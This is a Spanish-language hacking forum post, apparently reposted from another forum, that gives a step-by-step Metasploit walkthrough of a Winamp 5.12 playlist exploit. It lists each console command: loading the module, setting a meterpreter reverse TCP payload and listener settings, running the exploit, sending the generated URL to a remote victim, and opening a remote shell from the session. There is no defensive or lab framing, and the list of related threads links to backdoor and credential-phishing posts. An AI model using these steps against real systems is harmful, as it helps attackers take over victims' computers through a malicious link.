comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Metasploit] Vulnerabilidad Winamp 5.12

  • 0 Respuestas
  • 1514 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado LucaSthefano

  • *
  • Underc0der
  • Mensajes: 399
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Julio 20, 2011, 01:58:25 am »
Buenas, estuve revisando la lista de exploits para Navegadores (Browser) de Windows.
Cuando me tope con una de Winamp con lo que me decidí a probarla..

Vamos que es así:
Con el siguiente código usamos el Exploit
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
use exploit/windows/browser/winamp_playlist_unc
Seleccionamos nuestro Payload de Reversa
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
set payload windows/meterpreter/reverse_tcp
Acá seteamos nuestra IP localhost
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
set LHOST
Acá la IP del Server (Nuestra IP)
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
set SRVHOST
Con este seleccionamos el PUERTO de escucha
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
set SRVPORT
Finalmente lanzamos el Exploit
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
exploit
Nos generará una URL la cual debemos pasar al REMOTO, al abrirla si tiene Winamp, se le abrirá automáticamente con este y le dará un mensaje acerca de su lista de reproducción.

A nosotros en la Consola nos llegará un mensaje de una sesión del Meterpreter abierta..
Verificamos la sesión con el comando
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
sessions

Viendo que en mi caso hay 1 sesión la llamo con
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
sessions -i 1
Nos llegara el mensaje del meterpreter y con esto ya podríamos llamar la shell remota
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
shell
Hasta aquí llegamos..

Autor: Kodeinfect
Fuente: Foro Portal Hacker
« Última modificación: Agosto 08, 2014, 08:41:55 pm por Expermicid »

 

¿Te gustó el post? COMPARTILO!



"Escaneo Invisible" con NMAP y Metasploit

Iniciado por Stiuvert

Respuestas: 3
Vistas: 6447
Último mensaje Junio 21, 2013, 09:33:46 pm
por GhostFire
Metasploit + Metasm (Ghost Writing ASM) para crear un backdoor indetectable

Iniciado por Aryenal.Bt

Respuestas: 11
Vistas: 5378
Último mensaje Noviembre 20, 2012, 12:25:34 am
por BCKTR1X
Obtener contraseña (admin) de windows con metasploit usando el módulo phish_windows_credentials

Iniciado por LionSec

Respuestas: 8
Vistas: 2975
Último mensaje Mayo 25, 2015, 02:49:25 pm
por MagoAstral
MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit

Iniciado por BrowserNet

Respuestas: 8
Vistas: 5545
Último mensaje Abril 05, 2017, 01:37:02 am
por puntoCL
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue

Iniciado por puntoCL

Respuestas: 2
Vistas: 1538
Último mensaje Enero 24, 2018, 02:34:25 am
por coke951